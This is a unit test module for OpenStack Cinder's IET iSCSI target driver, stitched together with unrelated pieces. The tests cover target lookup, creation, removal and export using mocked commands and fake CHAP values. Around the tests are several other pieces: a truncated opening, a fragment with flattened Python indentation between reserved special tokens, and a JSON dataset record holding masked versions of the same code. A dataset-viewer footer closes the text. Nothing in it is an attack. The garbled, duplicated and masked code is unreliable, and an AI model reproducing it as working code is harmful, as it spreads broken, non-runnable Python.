        # Failure path: a failing ietadm run is wrapped in RemoveFailed.
        mock_execute.side_effect = putils.ProcessExecutionError
        self.assertRaises(exception.ISCSITargetRemoveFailed,
                          self.target.remove_iscsi_target,
                          1, 0, self.testvol['id'], self.testvol['name'])

    def test_find_sid_cid_for_target(self):
        """The (sid, cid) pair is parsed out of the session file entry."""
        with mock.patch('six.moves.builtins.open') as mock_open:
            mock_open.return_value = contextlib.closing(
                self._fake_session_file())
            self.assertEqual(
                ('844427031282176', '0'),
                self.target._find_sid_cid_for_target('1', self._IQN,
                                                     self._VOLUME_NAME))
<|reserved_special_token_0|>
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',
return_value=None)
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)
def test_ensure_export(self, mock_get_targetm, mock_get_chap):
ctxt = context.get_admin_context()
with mock.patch.object(self.target, 'create_iscsi_target'):
self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir
)
self.target.create_iscsi_target.assert_called_once_with(
'iqn.2010-10.org.openstack:testvol', 1, 0, self.
fake_volumes_dir, None, portals_ips=[self.configuration.
iscsi_ip_address], portals_port=int(self.configuration.
iscsi_port), check_exit_code=False, old_name=None)
<|reserved_special_token_1|>
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import mock
from oslo_concurrency import processutils as putils
import six
from cinder import context
from cinder import exception
from cinder.tests.unit.targets import targets_fixture as tf
from cinder import utils
from cinder.volume.targets import iet
class TestIetAdmDriver(tf.TargetDriverFixture):
    """Unit tests for the IET (iSCSI Enterprise Target) driver IetAdm."""

    # Canonical fake volume name / IQN shared by the proc-file parsing tests.
    _VOLUME_NAME = 'volume-83c2e877-feed-46be-8435-77884fe55b45'
    _IQN = 'iqn.2010-10.org.openstack:' + _VOLUME_NAME
    # A single session entry as rendered by the IET proc session file.
    _PROC_SESSION = (
        'tid:1 name:' + _IQN + '\n'
        ' sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n'
        ' cid:0 ip:10.9.8.7 state:active hd:none dd:none')

    def setUp(self):
        super(TestIetAdmDriver, self).setUp()
        # Driver under test, wired to the shared fixture configuration.
        self.target = iet.IetAdm(root_helper=utils.get_root_helper(),
                                 configuration=self.configuration)

    def _fake_session_file(self):
        """Return a seekable file-like stand-in for the IET session file."""
        fake = six.StringIO()
        fake.write(self._PROC_SESSION)
        fake.seek(0)
        return fake

    def test_get_target(self):
        """_get_target resolves an IQN to its tid via the session file."""
        with mock.patch('six.moves.builtins.open') as mock_open:
            mock_open.return_value = contextlib.closing(
                self._fake_session_file())
            self.assertEqual('1', self.target._get_target(self._IQN))

            # Failure path: errors while reading the session file propagate.
            mock_open.side_effect = MemoryError()
            self.assertRaises(MemoryError, self.target._get_target, '')

    @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',
                return_value=0)
    @mock.patch('cinder.utils.execute')
    @mock.patch('os.path.exists', return_value=True)
    @mock.patch('cinder.utils.temporary_chown')
    @mock.patch.object(iet, 'LOG')
    def test_create_iscsi_target(self, mock_log, mock_chown, mock_exists,
                                 mock_execute, mock_get_targ):
        """Creation succeeds, and config/auth failures raise CreateFailed."""
        mock_execute.return_value = ('', '')
        conf_file = six.StringIO()
        with mock.patch('six.moves.builtins.open') as mock_open:
            mock_open.return_value = contextlib.closing(conf_file)
            tid = self.target.create_iscsi_target(self.test_vol, 0, 0,
                                                  self.fake_volumes_dir)
            self.assertEqual(0, tid)
            self.assertTrue(mock_execute.called)
            self.assertTrue(mock_open.called)
            self.assertTrue(mock_get_targ.called)

            # Failure path: opening/chowning the config file blows up.
            mock_open.side_effect = putils.ProcessExecutionError
            self.assertRaises(exception.ISCSITargetCreateFailed,
                              self.target.create_iscsi_target,
                              self.test_vol, 0, 0, self.fake_volumes_dir)

            # Failure path: ietadm refuses to set the new auth.
            mock_execute.side_effect = putils.ProcessExecutionError
            self.assertRaises(exception.ISCSITargetCreateFailed,
                              self.target.create_iscsi_target,
                              self.test_vol, 0, 0, self.fake_volumes_dir)

    @mock.patch('cinder.utils.execute')
    @mock.patch('os.path.exists', return_value=True)
    def test_update_config_file_failure(self, mock_exists, mock_execute):
        """A missing conf file plus a failing copy raises CreateFailed."""
        mock_exists.return_value = False
        mock_execute.side_effect = putils.ProcessExecutionError
        self.assertRaises(exception.ISCSITargetCreateFailed,
                          self.target.update_config_file,
                          self.test_vol, 0, self.fake_volumes_dir, "foo bar")

    @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',
                return_value=1)
    @mock.patch('cinder.utils.execute')
    def test_create_iscsi_target_already_exists(self, mock_execute,
                                                mock_get_targ):
        """Re-creating an existing target reuses the tid already assigned."""
        mock_execute.return_value = ('fake out', 'fake err')
        tid = self.target.create_iscsi_target(self.test_vol, 1, 0,
                                              self.fake_volumes_dir)
        self.assertEqual(1, tid)
        self.assertTrue(mock_get_targ.called)
        self.assertTrue(mock_execute.called)

    @mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',
                return_value=None)
    @mock.patch('os.path.exists', return_value=False)
    @mock.patch('cinder.utils.execute')
    def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):
        """Removal sends an ietadm delete and maps errors to RemoveFailed."""
        # Happy path: the delete op is issued for the right tid, as root.
        self.target.remove_iscsi_target(1, 0, self.testvol['id'],
                                        self.testvol['name'])
        mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',
                                     run_as_root=True)

        # Failure path: a failing ietadm run is wrapped in RemoveFailed.
        mock_execute.side_effect = putils.ProcessExecutionError
        self.assertRaises(exception.ISCSITargetRemoveFailed,
                          self.target.remove_iscsi_target,
                          1, 0, self.testvol['id'], self.testvol['name'])

    def test_find_sid_cid_for_target(self):
        """The (sid, cid) pair is parsed out of the session file entry."""
        with mock.patch('six.moves.builtins.open') as mock_open:
            mock_open.return_value = contextlib.closing(
                self._fake_session_file())
            self.assertEqual(
                ('844427031282176', '0'),
                self.target._find_sid_cid_for_target('1', self._IQN,
                                                     self._VOLUME_NAME))

    @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',
                return_value=1)
    @mock.patch('cinder.utils.execute')
    @mock.patch.object(iet.IetAdm, '_get_target_chap_auth')
    def test_create_export(self, mock_get_chap, mock_execute,
                           mock_get_targ):
        """create_export returns the portal location plus CHAP credentials."""
        mock_execute.return_value = ('', '')
        mock_get_chap.return_value = ('QZJbisGmn9AL954FNF4D',
                                      'P68eE7u9eFqDGexd28DQ')
        expected_result = {'location': '10.9.8.7:3260,1 '
                                       'iqn.2010-10.org.openstack:testvol 0',
                           'auth': 'CHAP '
                                   'QZJbisGmn9AL954FNF4D P68eE7u9eFqDGexd28DQ'}
        ctxt = context.get_admin_context()
        self.assertEqual(expected_result,
                         self.target.create_export(ctxt, self.testvol,
                                                   self.fake_volumes_dir))
        self.assertTrue(mock_execute.called)

    @mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',
                return_value=None)
    @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',
                return_value=1)
    def test_ensure_export(self, mock_get_target, mock_get_chap_auth):
        """ensure_export re-creates the target with configured portal info."""
        ctxt = context.get_admin_context()
        with mock.patch.object(self.target, 'create_iscsi_target'):
            self.target.ensure_export(ctxt, self.testvol,
                                      self.fake_volumes_dir)
            # The recreate must carry the portal IP/port from configuration
            # and tolerate a non-zero exit status from ietadm.
            self.target.create_iscsi_target.assert_called_once_with(
                'iqn.2010-10.org.openstack:testvol',
                1, 0, self.fake_volumes_dir, None,
                portals_ips=[self.configuration.iscsi_ip_address],
                portals_port=int(self.configuration.iscsi_port),
                check_exit_code=False,
                old_name=None)
|
flexible
|
{
"blob_id": "932502c93dd7dfc095adfe2ab88b4404396d9845",
"index": 8680,
"step-1": "<mask token>\n\n\nclass TestIetAdmDriver(tf.TargetDriverFixture):\n <mask token>\n\n def test_get_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual('1', self.target._get_target(\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n ))\n mock_open.side_effect = MemoryError()\n self.assertRaises(MemoryError, self.target._get_target, '')\n <mask token>\n\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n def test_update_config_file_failure(self, mock_exists, mock_execute):\n mock_exists.return_value = False\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.target.\n update_config_file, self.test_vol, 0, self.fake_volumes_dir,\n 'foo bar')\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestIetAdmDriver(tf.TargetDriverFixture):\n\n def setUp(self):\n super(TestIetAdmDriver, self).setUp()\n self.target = iet.IetAdm(root_helper=utils.get_root_helper(),\n configuration=self.configuration)\n\n def test_get_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual('1', self.target._get_target(\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n ))\n mock_open.side_effect = MemoryError()\n self.assertRaises(MemoryError, self.target._get_target, '')\n <mask token>\n\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n def test_update_config_file_failure(self, mock_exists, mock_execute):\n mock_exists.return_value = False\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.target.\n update_config_file, self.test_vol, 0, self.fake_volumes_dir,\n 'foo bar')\n <mask token>\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',\n return_value=None)\n @mock.patch('os.path.exists', return_value=False)\n @mock.patch('cinder.utils.execute')\n def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):\n self.target.remove_iscsi_target(1, 0, self.testvol['id'], self.\n testvol['name'])\n mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',\n run_as_root=True)\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetRemoveFailed, self.target.\n remove_iscsi_target, 1, 0, self.testvol['id'], self.testvol['name']\n )\n\n def 
test_find_sid_cid_for_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual(('844427031282176', '0'), self.target.\n _find_sid_cid_for_target('1',\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n , 'volume-83c2e877-feed-46be-8435-77884fe55b45'))\n <mask token>\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',\n return_value=None)\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)\n def test_ensure_export(self, mock_get_targetm, mock_get_chap):\n ctxt = context.get_admin_context()\n with mock.patch.object(self.target, 'create_iscsi_target'):\n self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir\n )\n self.target.create_iscsi_target.assert_called_once_with(\n 'iqn.2010-10.org.openstack:testvol', 1, 0, self.\n fake_volumes_dir, None, portals_ips=[self.configuration.\n iscsi_ip_address], portals_port=int(self.configuration.\n iscsi_port), check_exit_code=False, old_name=None)\n",
"step-3": "<mask token>\n\n\nclass TestIetAdmDriver(tf.TargetDriverFixture):\n\n def setUp(self):\n super(TestIetAdmDriver, self).setUp()\n self.target = iet.IetAdm(root_helper=utils.get_root_helper(),\n configuration=self.configuration)\n\n def test_get_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual('1', self.target._get_target(\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n ))\n mock_open.side_effect = MemoryError()\n self.assertRaises(MemoryError, self.target._get_target, '')\n <mask token>\n\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n def test_update_config_file_failure(self, mock_exists, mock_execute):\n mock_exists.return_value = False\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.target.\n update_config_file, self.test_vol, 0, self.fake_volumes_dir,\n 'foo bar')\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)\n @mock.patch('cinder.utils.execute')\n def test_create_iscsi_target_already_exists(self, mock_execute,\n mock_get_targ):\n mock_execute.return_value = 'fake out', 'fake err'\n self.assertEqual(1, self.target.create_iscsi_target(self.test_vol, \n 1, 0, self.fake_volumes_dir))\n self.assertTrue(mock_get_targ.called)\n self.assertTrue(mock_execute.called)\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',\n return_value=None)\n @mock.patch('os.path.exists', return_value=False)\n @mock.patch('cinder.utils.execute')\n def test_remove_iscsi_target(self, mock_execute, mock_exists, 
mock_find):\n self.target.remove_iscsi_target(1, 0, self.testvol['id'], self.\n testvol['name'])\n mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',\n run_as_root=True)\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetRemoveFailed, self.target.\n remove_iscsi_target, 1, 0, self.testvol['id'], self.testvol['name']\n )\n\n def test_find_sid_cid_for_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual(('844427031282176', '0'), self.target.\n _find_sid_cid_for_target('1',\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n , 'volume-83c2e877-feed-46be-8435-77884fe55b45'))\n <mask token>\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',\n return_value=None)\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)\n def test_ensure_export(self, mock_get_targetm, mock_get_chap):\n ctxt = context.get_admin_context()\n with mock.patch.object(self.target, 'create_iscsi_target'):\n self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir\n )\n self.target.create_iscsi_target.assert_called_once_with(\n 'iqn.2010-10.org.openstack:testvol', 1, 0, self.\n fake_volumes_dir, None, portals_ips=[self.configuration.\n iscsi_ip_address], portals_port=int(self.configuration.\n iscsi_port), check_exit_code=False, old_name=None)\n",
"step-4": "<mask token>\n\n\nclass TestIetAdmDriver(tf.TargetDriverFixture):\n\n def setUp(self):\n super(TestIetAdmDriver, self).setUp()\n self.target = iet.IetAdm(root_helper=utils.get_root_helper(),\n configuration=self.configuration)\n\n def test_get_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual('1', self.target._get_target(\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n ))\n mock_open.side_effect = MemoryError()\n self.assertRaises(MemoryError, self.target._get_target, '')\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=0)\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n @mock.patch('cinder.utils.temporary_chown')\n @mock.patch.object(iet, 'LOG')\n def test_create_iscsi_target(self, mock_log, mock_chown, mock_exists,\n mock_execute, mock_get_targ):\n mock_execute.return_value = '', ''\n tmp_file = six.StringIO()\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual(0, self.target.create_iscsi_target(self.\n test_vol, 0, 0, self.fake_volumes_dir))\n self.assertTrue(mock_execute.called)\n self.assertTrue(mock_open.called)\n self.assertTrue(mock_get_targ.called)\n mock_open.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.\n target.create_iscsi_target, self.test_vol, 0, 0, self.\n fake_volumes_dir)\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.\n target.create_iscsi_target, 
self.test_vol, 0, 0, self.\n fake_volumes_dir)\n\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n def test_update_config_file_failure(self, mock_exists, mock_execute):\n mock_exists.return_value = False\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed, self.target.\n update_config_file, self.test_vol, 0, self.fake_volumes_dir,\n 'foo bar')\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)\n @mock.patch('cinder.utils.execute')\n def test_create_iscsi_target_already_exists(self, mock_execute,\n mock_get_targ):\n mock_execute.return_value = 'fake out', 'fake err'\n self.assertEqual(1, self.target.create_iscsi_target(self.test_vol, \n 1, 0, self.fake_volumes_dir))\n self.assertTrue(mock_get_targ.called)\n self.assertTrue(mock_execute.called)\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',\n return_value=None)\n @mock.patch('os.path.exists', return_value=False)\n @mock.patch('cinder.utils.execute')\n def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):\n self.target.remove_iscsi_target(1, 0, self.testvol['id'], self.\n testvol['name'])\n mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',\n run_as_root=True)\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetRemoveFailed, self.target.\n remove_iscsi_target, 1, 0, self.testvol['id'], self.testvol['name']\n )\n\n def test_find_sid_cid_for_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n \"\"\"tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\n sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\n cid:0 ip:10.9.8.7 state:active hd:none dd:none\"\"\"\n )\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n 
self.assertEqual(('844427031282176', '0'), self.target.\n _find_sid_cid_for_target('1',\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'\n , 'volume-83c2e877-feed-46be-8435-77884fe55b45'))\n <mask token>\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',\n return_value=None)\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)\n def test_ensure_export(self, mock_get_targetm, mock_get_chap):\n ctxt = context.get_admin_context()\n with mock.patch.object(self.target, 'create_iscsi_target'):\n self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir\n )\n self.target.create_iscsi_target.assert_called_once_with(\n 'iqn.2010-10.org.openstack:testvol', 1, 0, self.\n fake_volumes_dir, None, portals_ips=[self.configuration.\n iscsi_ip_address], portals_port=int(self.configuration.\n iscsi_port), check_exit_code=False, old_name=None)\n",
"step-5": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport contextlib\n\nimport mock\nfrom oslo_concurrency import processutils as putils\nimport six\n\nfrom cinder import context\nfrom cinder import exception\n\nfrom cinder.tests.unit.targets import targets_fixture as tf\nfrom cinder import utils\nfrom cinder.volume.targets import iet\n\n\nclass TestIetAdmDriver(tf.TargetDriverFixture):\n\n def setUp(self):\n super(TestIetAdmDriver, self).setUp()\n self.target = iet.IetAdm(root_helper=utils.get_root_helper(),\n configuration=self.configuration)\n\n def test_get_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n 'tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\\n' # noqa\n ' sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\\n' # noqa\n ' cid:0 ip:10.9.8.7 state:active hd:none dd:none')\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual('1',\n self.target._get_target(\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45' # noqa\n ))\n\n # Test the failure case: Failed to handle the config file\n mock_open.side_effect = MemoryError()\n self.assertRaises(MemoryError,\n self.target._get_target,\n '')\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',\n return_value=0)\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n 
@mock.patch('cinder.utils.temporary_chown')\n @mock.patch.object(iet, 'LOG')\n def test_create_iscsi_target(self, mock_log, mock_chown, mock_exists,\n mock_execute, mock_get_targ):\n mock_execute.return_value = ('', '')\n tmp_file = six.StringIO()\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual(\n 0,\n self.target.create_iscsi_target(\n self.test_vol,\n 0,\n 0,\n self.fake_volumes_dir))\n self.assertTrue(mock_execute.called)\n self.assertTrue(mock_open.called)\n self.assertTrue(mock_get_targ.called)\n\n # Test the failure case: Failed to chown the config file\n mock_open.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed,\n self.target.create_iscsi_target,\n self.test_vol,\n 0,\n 0,\n self.fake_volumes_dir)\n\n # Test the failure case: Failed to set new auth\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed,\n self.target.create_iscsi_target,\n self.test_vol,\n 0,\n 0,\n self.fake_volumes_dir)\n\n @mock.patch('cinder.utils.execute')\n @mock.patch('os.path.exists', return_value=True)\n def test_update_config_file_failure(self, mock_exists, mock_execute):\n # Test the failure case: conf file does not exist\n mock_exists.return_value = False\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetCreateFailed,\n self.target.update_config_file,\n self.test_vol,\n 0,\n self.fake_volumes_dir,\n \"foo bar\")\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',\n return_value=1)\n @mock.patch('cinder.utils.execute')\n def test_create_iscsi_target_already_exists(self, mock_execute,\n mock_get_targ):\n mock_execute.return_value = ('fake out', 'fake err')\n self.assertEqual(\n 1,\n self.target.create_iscsi_target(\n self.test_vol,\n 1,\n 0,\n self.fake_volumes_dir))\n self.assertTrue(mock_get_targ.called)\n 
self.assertTrue(mock_execute.called)\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',\n return_value=None)\n @mock.patch('os.path.exists', return_value=False)\n @mock.patch('cinder.utils.execute')\n def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):\n\n # Test the normal case\n self.target.remove_iscsi_target(1,\n 0,\n self.testvol['id'],\n self.testvol['name'])\n mock_execute.assert_any_call('ietadm',\n '--op',\n 'delete',\n '--tid=1',\n run_as_root=True)\n\n # Test the failure case: putils.ProcessExecutionError\n mock_execute.side_effect = putils.ProcessExecutionError\n self.assertRaises(exception.ISCSITargetRemoveFailed,\n self.target.remove_iscsi_target,\n 1,\n 0,\n self.testvol['id'],\n self.testvol['name'])\n\n def test_find_sid_cid_for_target(self):\n tmp_file = six.StringIO()\n tmp_file.write(\n 'tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45\\n' # noqa\n ' sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665\\n' # noqa\n ' cid:0 ip:10.9.8.7 state:active hd:none dd:none')\n tmp_file.seek(0)\n with mock.patch('six.moves.builtins.open') as mock_open:\n mock_open.return_value = contextlib.closing(tmp_file)\n self.assertEqual(('844427031282176', '0'),\n self.target._find_sid_cid_for_target(\n '1',\n 'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45', # noqa\n 'volume-83c2e877-feed-46be-8435-77884fe55b45' # noqa\n ))\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',\n return_value=1)\n @mock.patch('cinder.utils.execute')\n @mock.patch.object(iet.IetAdm, '_get_target_chap_auth')\n def test_create_export(self, mock_get_chap, mock_execute,\n mock_get_targ):\n mock_execute.return_value = ('', '')\n mock_get_chap.return_value = ('QZJbisGmn9AL954FNF4D',\n 'P68eE7u9eFqDGexd28DQ')\n expected_result = {'location': '10.9.8.7:3260,1 '\n 'iqn.2010-10.org.openstack:testvol 0',\n 'auth': 'CHAP '\n 'QZJbisGmn9AL954FNF4D P68eE7u9eFqDGexd28DQ'}\n 
ctxt = context.get_admin_context()\n self.assertEqual(expected_result,\n self.target.create_export(ctxt,\n self.testvol,\n self.fake_volumes_dir))\n self.assertTrue(mock_execute.called)\n\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',\n return_value=None)\n @mock.patch('cinder.volume.targets.iet.IetAdm._get_target',\n return_value=1)\n def test_ensure_export(self, mock_get_targetm, mock_get_chap):\n ctxt = context.get_admin_context()\n with mock.patch.object(self.target, 'create_iscsi_target'):\n self.target.ensure_export(ctxt,\n self.testvol,\n self.fake_volumes_dir)\n self.target.create_iscsi_target.assert_called_once_with(\n 'iqn.2010-10.org.openstack:testvol',\n 1, 0, self.fake_volumes_dir, None,\n portals_ips=[self.configuration.iscsi_ip_address],\n portals_port=int(self.configuration.iscsi_port),\n check_exit_code=False,\n old_name=None)\n",
"step-ids": [
3,
7,
8,
9,
12
]
}
|
[
3,
7,
8,
9,
12
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.